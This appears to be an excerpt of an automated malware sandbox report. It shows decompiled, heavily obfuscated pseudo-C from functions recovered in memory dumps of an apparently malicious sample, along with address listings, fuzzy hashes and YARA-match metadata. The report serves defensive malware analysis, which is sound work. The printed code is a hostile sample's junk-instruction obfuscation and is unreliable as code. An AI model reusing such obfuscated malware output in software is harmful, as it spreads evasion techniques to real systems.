						asm("cmpsb");
						return _t38 + 1;
					}
				}
				L1:
				_t101 = _t101 + 0x60a5d109;
				_push(_t63);
				asm("sbb eax, 0xe1100d2d");
				_t51 = _t51 | 0x000000b4;
				if(_t51 >= 0) {
					asm("ror dword [0xe6d76578], 0x10");
					_t94 = _t93 ^ 0xbfeb0c05;
					 *0x28ff453a =  *0x28ff453a >> 0x4d;
					asm("movsw");
					 *0xf1d022b0 =  *0xf1d022b0 | _t51;
					asm("adc esi, 0x5a42bbbb");
					asm("sbb ecx, [0xd307be1d]");
					_push( *0x5096aa68);
					 *0xd44df2b6 =  *0xd44df2b6 << 0x7e;
					 *0x104c9dba = _t94;
					asm("sbb ah, [0xb5b44334]");
					asm("sbb [0x55e1ff0a], cl");
					asm("adc bl, [0x9dac3a8]");
					_t70 = _t68 | 0x9e32a692 |  *0x2deac01c;
					asm("sbb eax, 0x400ad305");
					 *0xdb4059ea =  *0xdb4059ea << 0x69;
					 *0xda12699d =  *0xda12699d + _t70;
					asm("rcr dword [0xe185cbd8], 0x29");
					_push((_t51 & 0x541862c0) + 0x00000001 & 0x0000000a);
					_t89 = _t89 ^ 0xcef84265;
					_t93 = _t94 + 0x4066e08d;
					_t51 =  *0x587812b3;
					asm("rcl dword [0x3becb6f4], 0xd6");
					 *0xfaccb638 =  *0xfaccb638 >> 0x68;
					_push(_t51);
					 *0x60645a68 = _t51;
					asm("adc edi, 0x2b7622fe");
					 *0x11f05f9a =  *0x11f05f9a ^ 0x8e77fc03;
					 *0x92411c02 =  *0x92411c02 >> 0xc9;
					_t63 = _t63 - 0x00000001 |  *0xf9485cd4;
					_t38 = 1 +  *0xda136d6a * 0x2a0f;
					 *0xe8a9d582 =  *0xe8a9d582 + _t51;
					_t101 =  *0x187a8c6a * 0x00002860 |  *0x1ae46b96;
					L1();
					_t68 = _t70 | 0xf476b3e8;
					if(_t68 > 0) {
						asm("sbb edi, [0x5d82c126]");
						_t15 = _t81;
						_t81 =  *0xefd21b9c;
						 *0xefd21b9c = _t15;
						asm("rcr dword [0x8b347e0e], 0x83");
						asm("lodsb");
						asm("adc esi, 0xcadecfa3");
						_t68 = 0x4f1ca113;
						asm("sbb [0xde9c0509], ebx");
						asm("adc edi, [0xd23112f3]");
						if(( *0xcb00c276 & _t51) < 0) {
							asm("sbb eax, 0x4aec2b73");
							asm("adc [0xf8f84184], ah");
							_t101 = _t101 ^  *0x4289fd6d |  *0x292a8d89;
							asm("sbb dl, [0x40d8ae3a]");
							 *0x840801ce =  *0x840801ce << 0xdf;
							 *0xaf18b994 = _t89;
							 *0xb183f72b =  *0xb183f72b >> 0xa6;
							 *0x1d9cabca =  *0x1d9cabca << 0x20;
							_t68 =  *0x6d898921 +  *0x4528e3fc;
							asm("adc eax, [0xe82ae92]");
							asm("stosd");
							 *0x631237b9 =  *0x631237b9 << 0x59;
							 *0x84243882 =  *0x84243882 << 0x65;
							if( *0x84243882 < 0) {
								_t89 = _t89 ^  *0xe52aa033;
								asm("movsw");
								 *0x7d7ffdb4 =  *0x7d7ffdb4 >> 0x90;
								asm("lodsd");
								asm("rcl byte [0x579f2dd0], 0x8b");
								_t51 = 0xf2;
								_push(_t38);
								asm("adc cl, 0x2");
								_t93 = (_t93 &  *0xe3261b67) - 0x5378099f;
								asm("rcr byte [0xf8e07722], 0x6b");
								_t63 = _t63 |  *0xb2d2d0c;
								_t38 =  *0x83604569 * 0x15cf;
								_t101 = _t101 ^ 0x267779ed;
								 *0xdf240b96 =  *0xdf240b96 >> 0x5c;
								if(_t101 >= 0) {
									_t89 = _t89 |  *0xbdba6c17;
									_t81 =  *0x3ad4ad6a * 0xc7b3;
									 *0x3d0ea899 =  *0x3d0ea899 << 0x83;
									asm("sbb ebp, 0xbb578cd1");
									_t63 = (_t63 ^ 0xe3728672) + 1;
									 *0xb76fbd39 =  *0xb76fbd39 << 0x32;
									asm("adc esi, [0xa8b14d1b]");
									asm("rcr dword [0xb8e8f483], 0xff");
									asm("adc ecx, [0x6092bff4]");
									 *0x12762201 =  *0x12762201 - _t68;
									_t38 = (_t38 ^  *0x267778ee) +  *0x3a74b112 | 0x1bf2f02d;
									_push( *0xfe0fce81);
									_t51 = 0xf2;
									if(_t68 >  *0x23fe4a9b) {
										_t101 = _t101 ^  *0xaa0c0d76;
										 *0x66507286 =  *0x66507286 << 0x4e;
										 *0xa97d9bd2 =  *0xa97d9bd2 << 0x5d;
										_t81 = _t81 +  *0xa96f5919 - 1;
										asm("rcl dword [0xae2d3a07], 0x2c");
										 *0x22feaf6e =  *0x22feaf6e >> 0x97;
										 *0x6505c09 =  *0x6505c09 << 0x55;
										_pop(_t63);
										asm("adc [0x3879c9c0], ebp");
										_t89 = _t89 | 0xed080a2d;
										_t51 =  *0x9e127e32 +  *0xe18f3a81;
										asm("ror dword [0xda2545bf], 0xe");
										 *0xa676017 =  *0xa676017 ^ _t89;
										_t93 = _t93 +  *0x839e72b8;
										if(_t93 == 0) {
											asm("sbb [0x8ee40e1b], eax");
											_t89 =  *0x22e75435;
											asm("adc [0xf02f2314], dh");
											asm("adc [0xc6dfaf9], ch");
											_pop(_t101);
											 *0x427609c0 = _t38;
											asm("adc ebp, 0x129f032e");
											 *0x5ebcd7f4 =  *0x5ebcd7f4 & _t89;
											_t51 = _t51 + 0xbb83bbc7;
											asm("cmpsw");
											asm("adc [0x3c77a686], ch");
											 *0xfbbc2d31 =  *0xfbbc2d31 >> 0x45;
											if( *0xfbbc2d31 > 0) {
												asm("rcl byte [0x1cac5ab4], 0xba");
												asm("rcl byte [0x7cf4a504], 0xd5");
												asm("sbb edi, 0xf9e01ce");
												asm("adc [0x705b0c65], ebx");
												asm("adc esi, 0x5d7d34de");
												_t101 = _t101 + 1;
												 *0xd3aea027 =  *0x48842d10;
												 *0xe0118c01 =  *0xe0118c01 << 0xa4;
												_push( *0x4c64bcff);
												_t63 = _t63 - 0x89443bc4 -  *0x87962cdf;
												asm("adc bl, 0x80");
												asm("sbb dh, 0x14");
												 *0xa27872dc = _t101;
												asm("ror dword [0xeab3b317], 0x7e");
												 *0x73dc9a13 =  *0x73dc9a13 << 0x96;
												_t49 = 0x6c6009aa ^  *0x3e8309f5;
												 *0xaa86d0 =  *0xaa86d0 << 0x93;
												_t89 = _t89 |  *0x3d7baf3e;
												asm("adc ebx, [0x8c2c0a9c]");
												asm("adc edx, [0xd030a0de]");
												_t87 =  *0x7c0b5e1f;
												asm("sbb esi, 0x40051f7");
												_t76 =  *0x52dd2560 * 0x88e;
												 *0xb5d505d2 =  *0xb5d505d2 - _t76;
												_pop( *0x2c9cd73e);
												_pop(_t93);
												asm("rol dword [0xb5c0cb65], 0x21");
												 *0x52174c1 = _t87;
												asm("rol dword [0xfa47a9c0], 0xf9");
												asm("sbb esi, [0xafcc05d3]");
												_push(_t49);
												_t38 =  *0x9c05d302;
												 *0x9c05d302 = _t49;
												asm("sbb [0xd3e9288f], ebp");
												 *0xe2e81005 =  *0xe2e81005 << 0x9a;
												 *0xdc05d3fd =  *0xdc05d3fd | _t87;
												_t51 =  *0xd3fbdedf;
												_t81 = _t87 | 0x228e8805;
												_t68 = _t76 -  *0xcf03d3eb;
												if(_t68 == 0) {
													asm("rol dword [0xab04bb7b], 0x1e");
													 *0x431373f =  *0x431373f ^ _t81;
													_t81 = _t81 ^  *0x313446a3;
													 *0x3a6ca904 = _t38;
													 *0x75ee0431 =  *0x75ee0431 & _t101;
													_t68 = _t68 |  *0xab05313c;
													asm("sbb esp, 0xd3ef2567");
												}
											}
										}
									}
								}
							}
						}
					}
				}
				goto L1;
			}














                                                                                                                                                              0x0041bfcc
                                                                                                                                                              0x0041c02a
                                                                                                                                                              0x0041c02b
                                                                                                                                                              0x0041c033
                                                                                                                                                              0x0041c039
                                                                                                                                                              0x0041c040
                                                                                                                                                              0x0041c046
                                                                                                                                                              0x0041c049
                                                                                                                                                              0x0041c04a
                                                                                                                                                              0x0041c051
                                                                                                                                                              0x0041c05d
                                                                                                                                                              0x0041c067
                                                                                                                                                              0x0041c06c
                                                                                                                                                              0x0041c077
                                                                                                                                                              0x0041c07d
                                                                                                                                                              0x0041c08d
                                                                                                                                                              0x0041c093
                                                                                                                                                              0x0041c099
                                                                                                                                                              0x0041c09a
                                                                                                                                                              0x0041c0a0
                                                                                                                                                              0x0041c0a6
                                                                                                                                                              0x0041c0ac
                                                                                                                                                              0x0041c0af
                                                                                                                                                              0x00000000
                                                                                                                                                              0x0041c0b5
                                                                                                                                                              0x0041c0bb
                                                                                                                                                              0x0041c0c2
                                                                                                                                                              0x0041c0ce
                                                                                                                                                              0x0041c0d4
                                                                                                                                                              0x0041c0ea
                                                                                                                                                              0x0041c0fc
                                                                                                                                                              0x0041c0fc
                                                                                                                                                              0x0041c0af
                                                                                                                                                              0x0041b4a6
                                                                                                                                                              0x0041b4a6
                                                                                                                                                              0x0041b4b1
                                                                                                                                                              0x0041b4b2
                                                                                                                                                              0x0041b4bd
                                                                                                                                                              0x0041b4c0
                                                                                                                                                              0x0041b4c2
                                                                                                                                                              0x0041b4ca
                                                                                                                                                              0x0041b4d0
                                                                                                                                                              0x0041b4d7
                                                                                                                                                              0x0041b4d9
                                                                                                                                                              0x0041b4e5
                                                                                                                                                              0x0041b4f1
                                                                                                                                                              0x0041b513
                                                                                                                                                              0x0041b519
                                                                                                                                                              0x0041b527
                                                                                                                                                              0x0041b532
                                                                                                                                                              0x0041b544
                                                                                                                                                              0x0041b550
                                                                                                                                                              0x0041b55c
                                                                                                                                                              0x0041b568
                                                                                                                                                              0x0041b56f
                                                                                                                                                              0x0041b576
                                                                                                                                                              0x0041b57f
                                                                                                                                                              0x0041b587
                                                                                                                                                              0x0041b598
                                                                                                                                                              0x0041b59f
                                                                                                                                                              0x0041b5a5
                                                                                                                                                              0x0041b5ab
                                                                                                                                                              0x0041b5b2
                                                                                                                                                              0x0041b5b9
                                                                                                                                                              0x0041b5ba
                                                                                                                                                              0x0041b5c0
                                                                                                                                                              0x0041b5c6
                                                                                                                                                              0x0041b5d2
                                                                                                                                                              0x0041b5d9
                                                                                                                                                              0x0041b5e5
                                                                                                                                                              0x0041b5f0
                                                                                                                                                              0x0041b5f6
                                                                                                                                                              0x0041b5fc
                                                                                                                                                              0x0041b601
                                                                                                                                                              0x0041b607
                                                                                                                                                              0x0041b613
                                                                                                                                                              0x0041b61a
                                                                                                                                                              0x0041b61a
                                                                                                                                                              0x0041b61a
                                                                                                                                                              0x0041b620
                                                                                                                                                              0x0041b627
                                                                                                                                                              0x0041b628
                                                                                                                                                              0x0041b62e
                                                                                                                                                              0x0041b634
                                                                                                                                                              0x0041b63a
                                                                                                                                                              0x0041b640
                                                                                                                                                              0x0041b646
                                                                                                                                                              0x0041b651
                                                                                                                                                              0x0041b657
                                                                                                                                                              0x0041b65d
                                                                                                                                                              0x0041b669
                                                                                                                                                              0x0041b670
                                                                                                                                                              0x0041b682
                                                                                                                                                              0x0041b689
                                                                                                                                                              0x0041b690
                                                                                                                                                              0x0041b696
                                                                                                                                                              0x0041b69c
                                                                                                                                                              0x0041b69d
                                                                                                                                                              0x0041b6a4
                                                                                                                                                              0x0041b6ab
                                                                                                                                                              0x0041b6b7
                                                                                                                                                              0x0041b6bd
                                                                                                                                                              0x0041b6c5
                                                                                                                                                              0x0041b6d2
                                                                                                                                                              0x0041b6d3
                                                                                                                                                              0x0041b6da
                                                                                                                                                              0x0041b6dc
                                                                                                                                                              0x0041b6e3
                                                                                                                                                              0x0041b6ec
                                                                                                                                                              0x0041b6f2
                                                                                                                                                              0x0041b6f9
                                                                                                                                                              0x0041b6ff
                                                                                                                                                              0x0041b709
                                                                                                                                                              0x0041b70f
                                                                                                                                                              0x0041b716
                                                                                                                                                              0x0041b72e
                                                                                                                                                              0x0041b734
                                                                                                                                                              0x0041b73e
                                                                                                                                                              0x0041b745
                                                                                                                                                              0x0041b74b
                                                                                                                                                              0x0041b74c
                                                                                                                                                              0x0041b753
                                                                                                                                                              0x0041b75f
                                                                                                                                                              0x0041b76c
                                                                                                                                                              0x0041b772
                                                                                                                                                              0x0041b778
                                                                                                                                                              0x0041b783
                                                                                                                                                              0x0041b789
                                                                                                                                                              0x0041b792
                                                                                                                                                              0x0041b798
                                                                                                                                                              0x0041b79e
                                                                                                                                                              0x0041b7a6
                                                                                                                                                              0x0041b7c3
                                                                                                                                                              0x0041b7ca
                                                                                                                                                              0x0041b7d1
                                                                                                                                                              0x0041b7d8
                                                                                                                                                              0x0041b7df
                                                                                                                                                              0x0041b7e0
                                                                                                                                                              0x0041b7e6
                                                                                                                                                              0x0041b7ec
                                                                                                                                                              0x0041b7f2
                                                                                                                                                              0x0041b7f9
                                                                                                                                                              0x0041b805
                                                                                                                                                              0x0041b80b
                                                                                                                                                              0x0041b823
                                                                                                                                                              0x0041b82e
                                                                                                                                                              0x0041b834
                                                                                                                                                              0x0041b83a
                                                                                                                                                              0x0041b840
                                                                                                                                                              0x0041b841
                                                                                                                                                              0x0041b846
                                                                                                                                                              0x0041b84c
                                                                                                                                                              0x0041b852
                                                                                                                                                              0x0041b858
                                                                                                                                                              0x0041b85a
                                                                                                                                                              0x0041b860
                                                                                                                                                              0x0041b867
                                                                                                                                                              0x0041b874
                                                                                                                                                              0x0041b8a2
                                                                                                                                                              0x0041b8b1
                                                                                                                                                              0x0041b8b7
                                                                                                                                                              0x0041b8bd
                                                                                                                                                              0x0041b8c3
                                                                                                                                                              0x0041b8c4
                                                                                                                                                              0x0041b8d6
                                                                                                                                                              0x0041b8dd
                                                                                                                                                              0x0041b8e3
                                                                                                                                                              0x0041b8e9
                                                                                                                                                              0x0041b8ec
                                                                                                                                                              0x0041b8f6
                                                                                                                                                              0x0041b8fc
                                                                                                                                                              0x0041b90d
                                                                                                                                                              0x0041b91b
                                                                                                                                                              0x0041b924
                                                                                                                                                              0x0041b92b
                                                                                                                                                              0x0041b931
                                                                                                                                                              0x0041b94f
                                                                                                                                                              0x0041b955
                                                                                                                                                              0x0041b95b
                                                                                                                                                              0x0041b961
                                                                                                                                                              0x0041b96b
                                                                                                                                                              0x0041b971
                                                                                                                                                              0x0041b977
                                                                                                                                                              0x0041b97f
                                                                                                                                                              0x0041b986
                                                                                                                                                              0x0041b98c
                                                                                                                                                              0x0041b993
                                                                                                                                                              0x0041b999
                                                                                                                                                              0x0041b99a
                                                                                                                                                              0x0041b99a
                                                                                                                                                              0x0041b9a0
                                                                                                                                                              0x0041b9a6
                                                                                                                                                              0x0041b9ad
                                                                                                                                                              0x0041b9b3
                                                                                                                                                              0x0041b9b9
                                                                                                                                                              0x0041b9bf
                                                                                                                                                              0x0041b9c5
                                                                                                                                                              0x0041b9cb
                                                                                                                                                              0x0041b9d2
                                                                                                                                                              0x0041b9d8
                                                                                                                                                              0x0041b9de
                                                                                                                                                              0x0041b9e4
                                                                                                                                                              0x0041b9ea
                                                                                                                                                              0x0041b9f0
                                                                                                                                                              0x0041b9f6
                                                                                                                                                              0x0041b9c5
                                                                                                                                                              0x0041b867
                                                                                                                                                              0x0041b80b
                                                                                                                                                              0x0041b792
                                                                                                                                                              0x0041b716
                                                                                                                                                              0x0041b6ab
                                                                                                                                                              0x0041b640
                                                                                                                                                              0x0041b607
                                                                                                                                                              0x00000000

                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000006.00000002.2203096098.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                              Yara matches
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID:
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID:
                                                                                                                                                              • Opcode ID: 70067eb8976241fc38006385e92a1e5d3dd2f03e25ca4ab9b343e670588d1b7e
                                                                                                                                                              • Instruction ID: 8cedc2734293f4c8d5d7417586f6b058c394183bae58e294a8a6b157dd285bf2
                                                                                                                                                              • Opcode Fuzzy Hash: 70067eb8976241fc38006385e92a1e5d3dd2f03e25ca4ab9b343e670588d1b7e
                                                                                                                                                              • Instruction Fuzzy Hash: 45E19932919785CFD716CF38DACA7413FB2F352324B08428EC8A2A7596D7742956CF86
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              Function 0096905A, Relevance: .3, Instructions: 283COMMON
                                                                                                                                                              Download Yara Rule
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000006.00000002.2203624657.0000000000930000.00000040.00000001.sdmp, Offset: 00920000, based on PE: true
                                                                                                                                                              • Associated: 00000006.00000002.2203612094.0000000000920000.00000040.00000001.sdmp Download File
                                                                                                                                                              • Associated: 00000006.00000002.2203719368.0000000000A10000.00000040.00000001.sdmp Download File
                                                                                                                                                              • Associated: 00000006.00000002.2203724457.0000000000A20000.00000040.00000001.sdmp Download File
                                                                                                                                                              • Associated: 00000006.00000002.2203728871.0000000000A24000.00000040.00000001.sdmp Download File
                                                                                                                                                              • Associated: 00000006.00000002.2203733148.0000000000A27000.00000040.00000001.sdmp Download File
                                                                                                                                                              • Associated: 00000006.00000002.2203744469.0000000000A30000.00000040.00000001.sdmp Download File
                                                                                                                                                              • Associated: 00000006.00000002.2203809294.0000000000A90000.00000040.00000001.sdmp Download File
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID:
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID:
                                                                                                                                                              • Opcode ID: 308f069385edc7c5a6b3ce5f43d1bbbe0504790908fb9e59101996f29be88ba6
                                                                                                                                                              • Instruction ID: b20889a290f5da358d26dc7ef903e332deca842d1c77e1d3713cb93c85759682
                                                                                                                                                              • Opcode Fuzzy Hash: 308f069385edc7c5a6b3ce5f43d1bbbe0504790908fb9e59101996f29be88ba6
                                                                                                                                                              • Instruction Fuzzy Hash: DBB19C30A042599FDB30CF68CD84BBAB3F9EF45710F15859AE94AEB291D7349D84CB21
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              Function 0094E2E9, Relevance: .3, Instructions: 280COMMON
                                                                                                                                                              Download Yara Rule
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000006.00000002.2203624657.0000000000930000.00000040.00000001.sdmp, Offset: 00920000, based on PE: true
                                                                                                                                                              • Associated: 00000006.00000002.2203612094.0000000000920000.00000040.00000001.sdmp Download File
                                                                                                                                                              • Associated: 00000006.00000002.2203719368.0000000000A10000.00000040.00000001.sdmp Download File
                                                                                                                                                              • Associated: 00000006.00000002.2203724457.0000000000A20000.00000040.00000001.sdmp Download File
                                                                                                                                                              • Associated: 00000006.00000002.2203728871.0000000000A24000.00000040.00000001.sdmp Download File
                                                                                                                                                              • Associated: 00000006.00000002.2203733148.0000000000A27000.00000040.00000001.sdmp Download File
                                                                                                                                                              • Associated: 00000006.00000002.2203744469.0000000000A30000.00000040.00000001.sdmp Download File
                                                                                                                                                              • Associated: 00000006.00000002.2203809294.0000000000A90000.00000040.00000001.sdmp Download File
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID:
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID:
                                                                                                                                                              • Opcode ID: a37a45ae2b1973cccd69b3a2288c59c5094c272ca27b1f635a4512856f58accc
                                                                                                                                                              • Instruction ID: 94410cac9f4f95853dd4bbd25e02ae9dabcc032143bf934c220f1ebb3a45be68
                                                                                                                                                              • Opcode Fuzzy Hash: a37a45ae2b1973cccd69b3a2288c59c5094c272ca27b1f635a4512856f58accc
                                                                                                                                                              • Instruction Fuzzy Hash: D6C1B134A00615CFCB24CF99D580AACF7F2FF89324F298269D865AB395D734AD46CB50
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              Function 0041B4A3, Relevance: .3, Instructions: 255COMMONCrypto
                                                                                                                                                              Download Yara Rule
                                                                                                                                                              C-Code - Quality: 42%
                                                                                                                                                              			E0041B4A3(void* _a172939549, void* _a1080483977) {
				void* _v5;
				char _v1400375715;
				char _t34;
				void* _t39;
				signed int _t42;
				signed int _t45;
				signed int _t48;
				signed char _t49;
				signed int _t50;
				signed int _t54;
				void* _t66;
				void* _t73;
				signed char _t75;
				signed int _t77;
				void* _t82;
				signed int _t86;
				signed char _t87;
				signed int _t88;
				signed int _t97;
				signed int _t98;
				signed int _t99;
				signed int _t100;
				signed int _t101;
				signed int _t102;
				signed int _t106;
				signed int _t107;
				signed int _t117;
				signed int _t126;
				signed int _t128;
				void* _t132;

				L1:
				_push(_t66);
				asm("sbb eax, 0xe1100d2d");
				_t50 = _t49 | 0x000000b4;
				if(_t50 >= 0) {
					asm("ror dword [0xe6d76578], 0x10");
					 *0x28ff453a =  *0x28ff453a >> 0x4d;
					asm("movsw");
					 *0xf1d022b0 =  *0xf1d022b0 | _t50;
					asm("adc esi, 0x5a42bbbb");
					asm("sbb ecx, [0xd307be1d]");
					_push( *0x5096aa68);
					 *0xd44df2b6 =  *0xd44df2b6 << 0x7e;
					 *0x104c9dba = _t107 ^ 0xbfeb0c05;
					asm("sbb ah, [0xb5b44334]");
					asm("sbb [0x55e1ff0a], cl");
					asm("adc bl, [0x9dac3a8]");
					_t77 = _t75 | 0x9e32a692 |  *0x2deac01c;
					asm("sbb eax, 0x400ad305");
					 *0xdb4059ea =  *0xdb4059ea << 0x69;
					 *0xda12699d =  *0xda12699d + _t77;
					asm("rcr dword [0xe185cbd8], 0x29");
					_push((_t50 & 0x541862c0) + 0x00000001 & 0x0000000a);
					_t100 = _t99 ^ 0xcef84265;
					_t54 =  *0x587812b3;
					asm("rcl dword [0x3becb6f4], 0xd6");
					 *0xfaccb638 =  *0xfaccb638 >> 0x68;
					_push(_t54);
					 *0x60645a68 = _t54;
					asm("adc edi, 0x2b7622fe");
					 *0x11f05f9a =  *0x11f05f9a ^ 0x8e77fc03;
					 *0x92411c02 =  *0x92411c02 >> 0xc9;
					_t39 = 1 +  *0xda136d6a * 0x2a0f;
					 *0xe8a9d582 =  *0xe8a9d582 + _t54;
					_t126 =  *0x187a8c6a * 0x00002860 |  *0x1ae46b96;
					L1();
					if((_t77 | 0xf476b3e8) > 0) {
						asm("sbb edi, [0x5d82c126]");
						 *0xefd21b9c = _t88;
						asm("rcr dword [0x8b347e0e], 0x83");
						asm("lodsb");
						asm("adc esi, 0xcadecfa3");
						asm("sbb [0xde9c0509], ebx");
						asm("adc edi, [0xd23112f3]");
						if(( *0xcb00c276 & _t54) < 0) {
							asm("sbb eax, 0x4aec2b73");
							asm("adc [0xf8f84184], ah");
							_t128 = _t126 ^  *0x4289fd6d |  *0x292a8d89;
							asm("sbb dl, [0x40d8ae3a]");
							 *0x840801ce =  *0x840801ce << 0xdf;
							 *0xaf18b994 = _t100;
							 *0xb183f72b =  *0xb183f72b >> 0xa6;
							 *0x1d9cabca =  *0x1d9cabca << 0x20;
							_t82 =  *0x6d898921 +  *0x4528e3fc;
							asm("adc eax, [0xe82ae92]");
							asm("stosd");
							 *0x631237b9 =  *0x631237b9 << 0x59;
							 *0x84243882 =  *0x84243882 << 0x65;
							if( *0x84243882 < 0) {
								_t101 = _t100 ^  *0xe52aa033;
								asm("movsw");
								 *0x7d7ffdb4 =  *0x7d7ffdb4 >> 0x90;
								asm("lodsd");
								asm("rcl byte [0x579f2dd0], 0x8b");
								_push(_t39);
								asm("adc cl, 0x2");
								asm("rcr byte [0xf8e07722], 0x6b");
								_t42 =  *0x83604569 * 0x15cf;
								 *0xdf240b96 =  *0xdf240b96 >> 0x5c;
								if((_t128 ^ 0x267779ed) >= 0) {
									_t102 = _t101 |  *0xbdba6c17;
									 *0x3d0ea899 =  *0x3d0ea899 << 0x83;
									asm("sbb ebp, 0xbb578cd1");
									 *0xb76fbd39 =  *0xb76fbd39 << 0x32;
									asm("adc esi, [0xa8b14d1b]");
									asm("rcr dword [0xb8e8f483], 0xff");
									asm("adc ecx, [0x6092bff4]");
									 *0x12762201 =  *0x12762201 - _t82;
									_t45 = (_t42 ^  *0x267778ee) +  *0x3a74b112 | 0x1bf2f02d;
									_push( *0xfe0fce81);
									if(_t82 >  *0x23fe4a9b) {
										 *0x66507286 =  *0x66507286 << 0x4e;
										 *0xa97d9bd2 =  *0xa97d9bd2 << 0x5d;
										asm("rcl dword [0xae2d3a07], 0x2c");
										 *0x22feaf6e =  *0x22feaf6e >> 0x97;
										 *0x6505c09 =  *0x6505c09 << 0x55;
										_pop(_t73);
										asm("adc [0x3879c9c0], ebp");
										asm("ror dword [0xda2545bf], 0xe");
										 *0xa676017 =  *0xa676017 ^ (_t102 | 0xed080a2d);
										if( &_v1400375715 +  *0x839e72b8 == 0) {
											asm("sbb [0x8ee40e1b], eax");
											_t106 =  *0x22e75435;
											asm("adc [0xf02f2314], dh");
											asm("adc [0xc6dfaf9], ch");
											_pop(_t132);
											 *0x427609c0 = _t45;
											asm("adc ebp, 0x129f032e");
											 *0x5ebcd7f4 =  *0x5ebcd7f4 & _t106;
											asm("cmpsw");
											asm("adc [0x3c77a686], ch");
											 *0xfbbc2d31 =  *0xfbbc2d31 >> 0x45;
											if( *0xfbbc2d31 > 0) {
												asm("rcl byte [0x1cac5ab4], 0xba");
												asm("rcl byte [0x7cf4a504], 0xd5");
												asm("sbb edi, 0xf9e01ce");
												asm("adc [0x705b0c65], ebx");
												asm("adc esi, 0x5d7d34de");
												_t117 = _t132 + 1;
												 *0xd3aea027 =  *0x48842d10;
												 *0xe0118c01 =  *0xe0118c01 << 0xa4;
												_push( *0x4c64bcff);
												_t66 = _t73 - 0x89443bc4 -  *0x87962cdf;
												asm("adc bl, 0x80");
												asm("sbb dh, 0x14");
												 *0xa27872dc = _t117;
												asm("ror dword [0xeab3b317], 0x7e");
												 *0x73dc9a13 =  *0x73dc9a13 << 0x96;
												_t48 = 0x6c6009aa ^  *0x3e8309f5;
												 *0xaa86d0 =  *0xaa86d0 << 0x93;
												_t99 = _t106 |  *0x3d7baf3e;
												asm("adc ebx, [0x8c2c0a9c]");
												asm("adc edx, [0xd030a0de]");
												_t97 =  *0x7c0b5e1f;
												asm("sbb esi, 0x40051f7");
												_t86 =  *0x52dd2560 * 0x88e;
												 *0xb5d505d2 =  *0xb5d505d2 - _t86;
												_pop( *0x2c9cd73e);
												_pop(_t107);
												asm("rol dword [0xb5c0cb65], 0x21");
												 *0x52174c1 = _t97;
												asm("rol dword [0xfa47a9c0], 0xf9");
												asm("sbb esi, [0xafcc05d3]");
												_push(_t48);
												_t34 =  *0x9c05d302;
												 *0x9c05d302 = _t48;
												asm("sbb [0xd3e9288f], ebp");
												 *0xe2e81005 =  *0xe2e81005 << 0x9a;
												 *0xdc05d3fd =  *0xdc05d3fd | _t97;
												_t49 =  *0xd3fbdedf;
												_t98 = _t97 | 0x228e8805;
												_t87 = _t86 -  *0xcf03d3eb;
												if(_t87 == 0) {
													asm("rol dword [0xab04bb7b], 0x1e");
													 *0x431373f =  *0x431373f ^ _t98;
													_t88 = _t98 ^  *0x313446a3;
													 *0x3a6ca904 = _t34;
													 *0x75ee0431 =  *0x75ee0431 & _t117;
													_t75 = _t87 |  *0xab05313c;
													asm("sbb esp, 0xd3ef2567");
												}
											}
										}
									}
								}
							}
						}
					}
				}
				goto L1;
			}

































                                                                                                                                                              0x0041b4a6
                                                                                                                                                              0x0041b4b1
                                                                                                                                                              0x0041b4b2
                                                                                                                                                              0x0041b4bd
                                                                                                                                                              0x0041b4c0
                                                                                                                                                              0x0041b4c2
                                                                                                                                                              0x0041b4d0
                                                                                                                                                              0x0041b4d7
                                                                                                                                                              0x0041b4d9
                                                                                                                                                              0x0041b4e5
                                                                                                                                                              0x0041b4f1
                                                                                                                                                              0x0041b513
                                                                                                                                                              0x0041b519
                                                                                                                                                              0x0041b527
                                                                                                                                                              0x0041b532
                                                                                                                                                              0x0041b544
                                                                                                                                                              0x0041b550
                                                                                                                                                              0x0041b55c
                                                                                                                                                              0x0041b568
                                                                                                                                                              0x0041b56f
                                                                                                                                                              0x0041b576
                                                                                                                                                              0x0041b57f
                                                                                                                                                              0x0041b587
                                                                                                                                                              0x0041b598
                                                                                                                                                              0x0041b5a5
                                                                                                                                                              0x0041b5ab
                                                                                                                                                              0x0041b5b2
                                                                                                                                                              0x0041b5b9
                                                                                                                                                              0x0041b5ba
                                                                                                                                                              0x0041b5c0
                                                                                                                                                              0x0041b5c6
                                                                                                                                                              0x0041b5d2
                                                                                                                                                              0x0041b5e5
                                                                                                                                                              0x0041b5f0
                                                                                                                                                              0x0041b5f6
                                                                                                                                                              0x0041b5fc
                                                                                                                                                              0x0041b607
                                                                                                                                                              0x0041b613
                                                                                                                                                              0x0041b61a
                                                                                                                                                              0x0041b620
                                                                                                                                                              0x0041b627
                                                                                                                                                              0x0041b628
                                                                                                                                                              0x0041b634
                                                                                                                                                              0x0041b63a
                                                                                                                                                              0x0041b640
                                                                                                                                                              0x0041b646
                                                                                                                                                              0x0041b651
                                                                                                                                                              0x0041b657
                                                                                                                                                              0x0041b65d
                                                                                                                                                              0x0041b669
                                                                                                                                                              0x0041b670
                                                                                                                                                              0x0041b682
                                                                                                                                                              0x0041b689
                                                                                                                                                              0x0041b690
                                                                                                                                                              0x0041b696
                                                                                                                                                              0x0041b69c
                                                                                                                                                              0x0041b69d
                                                                                                                                                              0x0041b6a4
                                                                                                                                                              0x0041b6ab
                                                                                                                                                              0x0041b6b7
                                                                                                                                                              0x0041b6bd
                                                                                                                                                              0x0041b6c5
                                                                                                                                                              0x0041b6d2
                                                                                                                                                              0x0041b6d3
                                                                                                                                                              0x0041b6dc
                                                                                                                                                              0x0041b6e3
                                                                                                                                                              0x0041b6f2
                                                                                                                                                              0x0041b6ff
                                                                                                                                                              0x0041b70f
                                                                                                                                                              0x0041b716
                                                                                                                                                              0x0041b72e
